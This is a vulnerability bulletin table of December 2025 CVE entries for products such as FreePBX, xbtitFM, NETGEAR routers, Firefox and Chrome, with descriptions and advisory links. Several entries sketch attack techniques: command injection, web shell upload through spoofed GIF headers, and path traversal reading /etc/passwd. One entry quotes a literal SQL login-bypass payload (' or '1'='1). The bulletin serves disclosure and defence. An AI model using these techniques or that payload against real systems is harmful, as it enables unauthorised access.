| FreePBX--FreePBX | FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to establish remote shell access. | 2025-12-11 | not yet calculated | CVE-2024-58294 | ExploitDB-52031 Official Product Homepage Original Video Link VulnCheck Advisory: FreePBX 16 Authenticated Remote Code Execution via API Module |
| elkarte--ElkArte Forum | ElkArte Forum 1.1.9 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the theme installation process. Attackers can upload a ZIP archive with a PHP file containing system commands, which can then be executed by accessing the uploaded file in the theme directory. | 2025-12-11 | not yet calculated | CVE-2024-58295 | ExploitDB-52026 ElkArte Homepage ElkArte Software Download VulnCheck Advisory: ElkArte Forum 1.1.9 Authenticated Remote Code Execution via Theme Upload |
| PhoenixCart--CE Phoenix | CE Phoenix v3.0.1 contains a stored cross-site scripting vulnerability in the currencies administration panel that allows attackers to inject malicious scripts. Attackers can insert XSS payloads in the title field to execute arbitrary JavaScript when administrators view the currencies page. | 2025-12-11 | not yet calculated | CVE-2024-58296 | ExploitDB-52015 PhoenixCart Homepage CE Phoenix Admin Panel Demo SoftAculous CE Phoenix App Page https://www.vulncheck.com/advisories/ce-phoenix-v-stored-cross-site-scripting-via-currencies-administration |
| Pyrocms--PyroCMS | PyroCMS v3.0.1 contains a stored cross-site scripting vulnerability in the admin redirects configuration that allows attackers to inject malicious scripts. Attackers can insert a payload in the 'Redirect From' field to execute arbitrary JavaScript when administrators view the redirects page. | 2025-12-11 | not yet calculated | CVE-2024-58297 | ExploitDB-52016 PyroCMS Homepage SoftAculous CMS Page VulnCheck Advisory: PyroCMS v3.0.1 Stored Cross-Site Scripting via Admin Redirects |
| BMC Software--Compuware iStrobe Web | Compuware iStrobe Web 20.13 contains a pre-authentication remote code execution vulnerability that allows unauthenticated attackers to upload malicious JSP files through a path traversal in the file upload form. Attackers can exploit the 'fileName' parameter to upload a web shell and execute arbitrary commands by sending POST requests to the uploaded JSP endpoint. | 2025-12-11 | not yet calculated | CVE-2024-58298 | ExploitDB-51991 BMC Compuware iStrobe Web Homepage BMC Compuware iStrobe Web Support Page https://www.vulncheck.com/advisories/compuware-istrobe-web-pre-auth-remote-code-execution-via-file-upload |
| Siklu--MultiHaul TG series | Siklu MultiHaul TG series devices before version 2.0.0 contain an unauthenticated vulnerability that allows remote attackers to retrieve randomly generated credentials via a network request. Attackers can send a specific hex-encoded command to port 12777 to obtain username and password, enabling direct SSH access to the device. | 2025-12-11 | not yet calculated | CVE-2024-58300 | ExploitDB-51932 Siklu Homepage VulnCheck Advisory: Siklu MultiHaul TG Series < 2.0.0 Unauthenticated Credential Disclosure |
| purei--Purei CMS | Purei CMS 1.0 contains a time-based blind SQL injection vulnerability that allows attackers to manipulate database queries through unfiltered user input parameters. Attackers can exploit vulnerable endpoints like getAllParks.php and events-ajax.php by injecting crafted SQL payloads to potentially extract or modify database information. | 2025-12-11 | not yet calculated | CVE-2024-58301 | ExploitDB-51929 Purei Homepage VulnCheck Advisory: Purei CMS 1.0 SQL Injection via Multiple Vulnerable Endpoints |
| Flarum--FriendsofFlarum Pretty Mail | FoF Pretty Mail 1.1.2 contains a local file inclusion vulnerability that allows administrative users to include arbitrary server files in email templates. Attackers can exploit the template settings by inserting file inclusion payloads to read sensitive system files like /etc/passwd during email generation. | 2025-12-11 | not yet calculated | CVE-2024-58302 | ExploitDB-51947 Flarum Homepage Pretty Mail GitHub Repository VulnCheck Advisory: FoF Pretty Mail 1.1.2 Local File Inclusion via Email Template Settings |
| Flarum--FriendsofFlarum Pretty Mail | FoF Pretty Mail 1.1.2 contains a server-side template injection vulnerability that allows administrative users to inject malicious code into email templates. Attackers can execute system commands by inserting crafted template expressions that trigger arbitrary code execution during email generation. | 2025-12-11 | not yet calculated | CVE-2024-58303 | ExploitDB-51948 Flarum Homepage Pretty Mail GitHub Repository VulnCheck Advisory: FoF Pretty Mail 1.1.2 Server Side Template Injection via Email Template Settings |
| minalic--minaliC | minaliC 2.0.0 contains a denial of service vulnerability that allows remote attackers to crash the web server by sending oversized GET requests. Attackers can send crafted HTTP requests with excessive data to overwhelm the server and cause service interruption. | 2025-12-11 | not yet calculated | CVE-2024-58306 | ExploitDB-51917 Reference VulnCheck Advisory: minaliC 2.0.0 Denial of Service Vulnerability via Large GET Request |
| cszcms--CSZCMS | CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information. | 2025-12-11 | not yet calculated | CVE-2024-58307 | ExploitDB-51916 CSZCMS Homepage CSZCMS Download Page VulnCheck Advisory: CSZCMS 1.3.0 Authenticated SQL Injection via Members View Endpoint |
| opensolution--Quick.CMS | Quick.CMS 6.7 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login authentication by manipulating the login form. Attackers can inject specific SQL payloads like ' or '1'='1 to gain unauthorized administrative access to the system. | 2025-12-11 | not yet calculated | CVE-2024-58308 | ExploitDB-51910 Official Product Homepage Software Link VulnCheck Advisory: Quick.CMS 6.7 SQL Injection Authentication Bypass via Admin Login |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database. | 2025-12-11 | not yet calculated | CVE-2024-58309 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Unauthenticated SQL Injection in shoutedit.php |
| Apc--Network Management Card 4 | APC Network Management Card 4 contains a path traversal vulnerability that allows unauthenticated attackers to access sensitive system files by manipulating URL parameters. Attackers can exploit directory traversal techniques to read critical system files like /etc/passwd by using encoded path traversal characters in HTTP requests. | 2025-12-11 | not yet calculated | CVE-2024-58310 | ExploitDB-51897 Official Product Homepage VulnCheck Advisory: APC Network Management Card 4 Path Traversal |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains a path traversal vulnerability that allows unauthenticated attackers to access sensitive system files by manipulating URL parameters. Attackers can exploit directory traversal techniques to read critical system files by using encoded path traversal characters in HTTP requests. | 2025-12-11 | not yet calculated | CVE-2024-58312 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Unauthenticated Path Traversal in nfogen.php |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains an insecure file upload vulnerability that allows authenticated attackers with administrative privileges to upload and execute arbitrary PHP code through the file_hosting feature. Attackers can bypass file type restrictions by modifying the Content-Type header to image/gif, adding GIF89a magic bytes, and using alternate PHP tags to upload web shells that execute system commands. | 2025-12-11 | not yet calculated | CVE-2024-58313 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Insecure File Upload in file_hosting Feature |
| HYPR--Server | Authentication Bypass by Spoofing vulnerability in HYPR Server allows Identity Spoofing. This issue affects Server: before 10.1. | 2025-12-11 | not yet calculated | CVE-2024-8273 | https://www.hypr.com/trust-center/security-advisories |
| Frappe--Frappe HelpDesk | SQL Injection in Frappe HelpDesk in the dashboard get_dashboard_data due to unsafe concatenation of user-controlled parameters into dynamic SQL statements. This issue affects Frappe HelpDesk: 1.14.0. | 2025-12-09 | not yet calculated | CVE-2025-10655 | https://fluidattacks.com/advisories/dyango https://github.com/frappe/helpdesk https://github.com/frappe/helpdesk/pull/2795 |
| Unknown--Construction Light | The Construction Light WordPress theme before 1.6.8 does not have authorization and CSRF checks when activating via an AJAX action, allowing any authenticated user, such as a subscriber, to activate arbitrary . | 2025-12-12 | not yet calculated | CVE-2025-10684 | https://wpscan.com/vulnerability/cfabf8b2-30a4-462f-996c-79888a439c09/ |
| HP Inc--HP System Event Utility | HP System Event Utility and Omen Gaming Hub might allow execution of certain files outside of their restricted paths. This potential vulnerability was remediated with HP System Event Utility version 3.2.12 and Omen Gaming Hub version 1101.2511.101.0. | 2025-12-09 | not yet calculated | CVE-2025-11531 | https://support.hp.com/us-en/document/ish_13537533-13537555-16/hpsbgn04079 |
| AlgoSec--Firewall Analyzer | Improper Privilege Management vulnerability in AlgoSec Firewall Analyzer on Linux, 64 bit allows Privilege Escalation, Parameter Injection. A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. This issue affects Firewall Analyzer: A33.0, A33.10. | 2025-12-09 | not yet calculated | CVE-2025-12381 | https://techdocs.algosec.com/en/cves/Content/tech-notes/cves/cve-2025-12381.htm |
| Unknown--HelloLeads CRM Form Shortcode | The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated users to reset them. | 2025-12-14 | not yet calculated | CVE-2025-12696 | https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/ |
| Rockwell Automation--FactoryTalk DataMosaix Private Cloud | A security issue was discovered in DataMosaix Private Cloud, allowing users with low privilege to perform sensitive database operations through exposed API endpoints. | 2025-12-09 | not yet calculated | CVE-2025-12807 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1765.html |
| Unknown--WooMulti | The WooMulti WordPress plugin through 17 does not validate a file parameter when deleting files, which could allow any authenticated user, such as a subscriber, to delete arbitrary files on the server. | 2025-12-12 | not yet calculated | CVE-2025-12835 | https://wpscan.com/vulnerability/1650ddac-04c7-47fa-b03e-bd0338243fcc/ |
| Unknown--Bookit | The Bookit WordPress plugin before 2.5.1 has a publicly accessible REST endpoint that allows unauthenticated update of the plugins Stripe payment options. | 2025-12-12 | not yet calculated | CVE-2025-12841 | https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/ |
| waveterm--waveterm | Code Injection using Electron Fuses in waveterm on macOS allows TCC Bypass. This issue affects waveterm: 0.12.2. | 2025-12-12 | not yet calculated | CVE-2025-12843 | https://fluidattacks.com/advisories/minutos https://github.com/wavetermdev/waveterm |
| NETGEAR--C6220 | Denial of Service Vulnerability in NETGEAR C6220 and C6230 (DOCSIS® 3.0 Two-in-one Cable Modem + WiFi Router) allows authenticated local WiFi users to reboot the router. | 2025-12-09 | not yet calculated | CVE-2025-12941 | https://www.netgear.com/support/product/c6220/ https://www.netgear.com/support/product/c6230/ https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| NETGEAR--R7000P | A vulnerability in NETGEAR Nighthawk R7000P routers lets an authenticated admin execute OS command injections due to improper input validation. This issue affects R7000P: through 1.3.3.154. | 2025-12-09 | not yet calculated | CVE-2025-12945 | https://www.netgear.com/support/product/r7000p https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| NETGEAR--RS700 | A vulnerability in the speedtest feature of affected NETGEAR Nighthawk routers, caused by improper input validation, can allow attackers on the router's WAN side, using attacker-in-the-middle (MiTM) techniques to manipulate DNS responses, to execute commands when speedtests are run. This issue affects RS700: through 1.0.7.82; RAX54Sv2: before V1.1.6.36; RAX41v2: before V1.1.6.36; RAX50: before V1.2.14.114; RAXE500: before V1.2.14.114; RAX41: before V1.0.17.142; RAX43: before V1.0.17.142; RAX35v2: before V1.0.17.142; RAXE450: before V1.2.14.114; RAX43v2: before V1.1.6.36; RAX42: before V1.0.17.142; RAX45: before V1.0.17.142; RAX50v2: before V1.1.6.36; MR90: before V1.0.2.46; MS90: before V1.0.2.46; RAX42v2: before V1.1.6.36; RAX49S: before V1.1.6.36. | 2025-12-09 | not yet calculated | CVE-2025-12946 | https://www.netgear.com/support/product/rs700 https://www.netgear.com/support/product/rax54sv2 https://www.netgear.com/support/product/rax41v2 https://www.netgear.com/support/product/RAX50 https://www.netgear.com/support/product/raxe500 https://www.netgear.com/support/product/rax41 https://www.netgear.com/support/product/rax43 https://www.netgear.com/support/product/rax35v2 https://www.netgear.com/support/product/raxe450 https://www.netgear.com/support/product/rax43v2 https://www.netgear.com/support/product/rax42 https://www.netgear.com/support/product/rax45 https://www.netgear.com/support/product/rax50v2 https://www.netgear.com/support/product/mr90 https://www.netgear.com/support/product/ms90 https://www.netgear.com/support/product/rax42v2 https://www.netgear.com/support/product/rax49s https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| Google Cloud--Dialogflow CX | A privilege escalation vulnerability exists in Google Cloud's Dialogflow CX. Dialogflow agent developers with Webhook editor permission are able to configure Webhooks using Dialogflow service agent access token authentication. This allows the attacker to escalate their privileges from agent-level to project-level, granting them unauthorized access to manage resources in services associated with the project, leading to unexpected costs and resource depletion for the producer project. A fix was applied on the server side to protect from this vulnerability in February 2025. No customer action is required. | 2025-12-10 | not yet calculated | CVE-2025-12952 | https://docs.cloud.google.com/dialogflow/docs/release-notes#June_12_2025 |
| Unknown--WPeMatico RSS Feed Fetcher | The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users, such as a contributor, to perform Stored Cross-Site Scripting attacks. | 2025-12-09 | not yet calculated | CVE-2025-13031 | https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/ |
| ASUSTOR--ADM | When the user sets the Notification sender to send emails to the SMTP server via msmtp, improperly validated TLS/SSL certificates allow an attacker who can intercept network traffic between the SMTP client and server to execute a man-in-the-middle (MITM) attack, which may expose sensitive SMTP information. Affected products and versions include: from ADM 4.1.0 through ADM 4.3.3.RKD2 as well as from ADM 5.0.0 through ADM 5.1.0.RN42. | 2025-12-12 | not yet calculated | CVE-2025-13052 | https://www.asustor.com/security/security_advisory_detail?id=49 |
| ASUSTOR--ADM | When a user configures the NAS to retrieve UPS status or control the UPS, non-enforced TLS certificate verification allows an attacker able to intercept network traffic between the client and server to perform a man-in-the-middle (MITM) attack, which may expose sensitive information from the UPS server configuration. This issue affects ADM: from 4.1.0 through 4.3.3.RKD2, from 5.0.0 through 5.1.0.RN42. | 2025-12-12 | not yet calculated | CVE-2025-13053 | https://www.asustor.com/security/security_advisory_detail?id=49 |
| Unknown--CSV to SortTable | The CSV to SortTable WordPress plugin through 4.2 does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated user, such as a contributor, to perform LFI attacks. | 2025-12-09 | not yet calculated | CVE-2025-13070 | https://wpscan.com/vulnerability/deb52d69-d7f8-43a5-a709-1f543fd343c6/ |
| Unknown--Custom Admin Menu | The Custom Admin Menu WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-09 | not yet calculated | CVE-2025-13071 | https://wpscan.com/vulnerability/83c47c58-0395-4224-beaa-2f64ed92ef16/ |
| Unknown--HandL UTM Grabber / Tracker | The HandL UTM Grabber / Tracker WordPress plugin before 2.8.1 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-10 | not yet calculated | CVE-2025-13072 | https://wpscan.com/vulnerability/e3795f29-b886-4b92-a7d6-5f5afd7090aa/ |
| Unknown--HandL UTM Grabber / Tracker | The HandL UTM Grabber / Tracker WordPress plugin before 2.8.1 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-10 | not yet calculated | CVE-2025-13073 | https://wpscan.com/vulnerability/697fc4be-782c-44cc-840a-774c8ab3ccd8/ |
| Toto Link--X5000R's (AX1800 router) | Unauthenticated Telnet enablement via cstecgi.cgi (authentication bypass) leading to unauthenticated root login with a blank password on factory/reset X5000R V9.1.0u.6369_B20230113 (arbitrary command execution). Earlier versions that share the same implementation may also be affected. | 2025-12-10 | not yet calculated | CVE-2025-13184 | https://hackingbydoing.wixsite.com/hackingbydoing/post/totolink-x5000r-ax1800-router-authentication-bypass |
| Google Cloud--Google Cloud SecOps SOAR | A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an "IDE role" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise. No customer action is required. All customers have been automatically upgraded to the fixed version: 6.3.64 or higher. | 2025-12-09 | not yet calculated | CVE-2025-13428 | https://cloud.google.com/support/bulletins#gcp-2025-075 |
| Dr.Buho--BuhoNTFS | BuhoNTFS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via insecure functions. This issue affects BuhoNTFS: 1.3.2. | 2025-12-12 | not yet calculated | CVE-2025-13733 | https://fluidattacks.com/advisories/greenday https://www.drbuho.com/buhontfs |
| Docker--Docker Desktop | Docker Desktop diagnostics bundles were found to include expired Hub PATs in log output due to error object serialization. This poses a risk of leaking sensitive information in exported diagnostics, especially when access denied errors occurred. | 2025-12-09 | not yet calculated | CVE-2025-13743 | https://docs.docker.com/desktop/troubleshoot-and-support/troubleshoot/#troubleshoot-menu |
| wolfSSL--wolfSSL | Multiple constant-time implementations in wolfSSL before version 5.8.4 may be transformed into non-constant-time binary by LLVM optimizations, which can potentially result in observable timing discrepancies and lead to information disclosure through timing side-channel attacks. | 2025-12-11 | not yet calculated | CVE-2025-13912 | https://github.com/wolfSSL/wolfssl/pull/9148 |
| GTT--Sistema de Información Tributario | Bypass vulnerability in the authentication method of the GTT Tax Information System application, related to the Active Directory (LDAP) login method. Authentication is performed through a local WebSocket, but the web application does not properly validate the authenticity or origin of the data received, allowing an attacker with access to the local machine or internal network to impersonate the legitimate WebSocket and inject manipulated information. Exploiting this vulnerability could allow an attacker to authenticate as any user in the domain without valid credentials, compromising the confidentiality, integrity, and availability of the application and its data. | 2025-12-10 | not yet calculated | CVE-2025-13953 | https://www.incibe.es/en/incibe-cert/notices/aviso/bypass-authentication-method-gtt-sistema-de-informacion-tributario |
| EZCast--EZCast Pro II | Hard-coded cryptographic keys in the Admin UI of EZCast Pro II version 1.17478.146 allow attackers to bypass authorization checks and gain full access to the admin UI. | 2025-12-10 | not yet calculated | CVE-2025-13954 | https://www.ncsc.admin.ch/ncsc/en/home/infos-fuer/infos-it-spezialisten/themen/schwachstelle-melden/cvd-cases/cvd-case-1-test.html |
| EZCast--EZCast Pro II | A predictable default Wi-Fi password in the Access Point functionality of EZCast Pro II version 1.17478.146 allows attackers in Wi-Fi range to gain access to the dongle by calculating the default password from observable device identifiers. | 2025-12-10 | not yet calculated | CVE-2025-13955 | https://www.ncsc.admin.ch/ncsc/en/home/infos-fuer/infos-it-spezialisten/themen/schwachstelle-melden/cvd-cases/cvd-case-1-test.html |
| GitHub--Enterprise Server | An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed user-supplied HTML to inject DOM elements with IDs that collided with server-initialized data islands. These collisions could overwrite or shadow critical application state objects used by certain Project views, leading to unintended server-side POST requests or other unauthorized backend interactions. Successful exploitation requires an attacker to have access to the target GitHub Enterprise Server instance and to entice a privileged user to view crafted malicious content that includes conflicting HTML elements. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18.3, 3.17.9, 3.16.12, 3.15.16, and 3.14.21. | 2025-12-11 | not yet calculated | CVE-2025-14046 | https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.3 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.9 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.12 https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.16 https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.21 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499.110 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2025-12-12 | not yet calculated | CVE-2025-14174 | |
| KNIME--KNIME Business Hub | A wrong permission check in KNIME Business Hub before version 1.17.0 allowed an authenticated user to save jobs of other users as if they were saved by the job owner. The attacker must have permissions to access the jobs, but they were then saved into the catalog service using the wrong owner permissions. Therefore it may have been possible to save into spaces where the attacker does not have write permissions. There is no workaround. | 2025-12-08 | not yet calculated | CVE-2025-14262 | https://www.knime.com/security/advisories#CVE-2025-11239 |
| Robocode Project--Robocode | A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/ | 2025-12-09 | not yet calculated | CVE-2025-14306 | https://github.com/robo-code/robocode/pull/67 |
| Robocode Project--Robocode | An insecure temporary file creation vulnerability exists in the AutoExtract component of Robocode version 1.9.3.6. The createTempFile method fails to securely create temporary files, allowing attackers to exploit race conditions and potentially execute arbitrary code or overwrite critical files. This vulnerability can be exploited by manipulating the temporary file creation process, leading to potential unauthorized actions. | 2025-12-09 | not yet calculated | CVE-2025-14307 | https://github.com/robo-code/robocode/pull/68 |
| Robocode Project--Robocode | An integer overflow vulnerability exists in the write method of the Buffer class in Robocode version 1.9.3.6. The method fails to properly validate the length of data being written, allowing attackers to cause an overflow, potentially leading to buffer overflows and arbitrary code execution. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the data length, leading to potential unauthorized code execution. | 2025-12-09 | not yet calculated | CVE-2025-14308 | https://github.com/robo-code/robocode/pull/70 |
| rethinkdb--rethinkdb | Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in rethinkdb. This issue affects rethinkdb: before 2.4.4. | 2025-12-09 | not yet calculated | CVE-2025-14310 | https://github.com/rethinkdb/rethinkdb/pull/7163 |
| JMRI--JMRI | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in JMRI. This issue affects JMRI: before 5.13.3. | 2025-12-09 | not yet calculated | CVE-2025-14311 | https://github.com/JMRI/JMRI/pull/14340 |
| Mozilla--Firefox | Use-after-free in the WebRTC: Signaling component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14321 | https://bugzilla.mozilla.org/show_bug.cgi?id=1992760 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics: CanvasWebGL component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14322 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996473 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Privilege escalation in the DOM: Notifications component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14323 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996555 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14324 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996840 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14325 | https://bugzilla.mozilla.org/show_bug.cgi?id=1998050 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Use-after-free in the Audio/Video: GMP component. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14326 | https://bugzilla.mozilla.org/show_bug.cgi?id=1840666 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Spoofing issue in the Downloads Panel component. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14327 | https://bugzilla.mozilla.org/show_bug.cgi?id=1970743 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Privilege escalation in the Netmonitor component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14328 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996761 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Privilege escalation in the Netmonitor component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14329 | https://bugzilla.mozilla.org/show_bug.cgi?id=1997018 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14330 | https://bugzilla.mozilla.org/show_bug.cgi?id=1997503 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Same-origin policy bypass in the Request Handling component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14331 | https://bugzilla.mozilla.org/show_bug.cgi?id=2000218 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14332 | Memory safety bugs fixed in Firefox 146 and Thunderbird 146 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox ESR 140.5, Thunderbird ESR 140.5, Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14333 | Memory safety bugs fixed in Firefox ESR 140.6, Thunderbird ESR 140.6, Firefox 146 and Thunderbird 146 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Google--Chrome | Use after free in Password Manager in Google Chrome prior to 143.0.7499.110 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-12 | not yet calculated | CVE-2025-14372 | |
| Google--Chrome | Inappropriate implementation in Toolbar in Google Chrome on Android prior to 143.0.7499.110 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-12 | not yet calculated | CVE-2025-14373 | |
| Gladinet--CentreStack and TrioFox | Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values in their implementation of the AES cryptoscheme. This degrades security for publicly exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise. | 2025-12-12 | not yet calculated | CVE-2025-14611 | https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability |
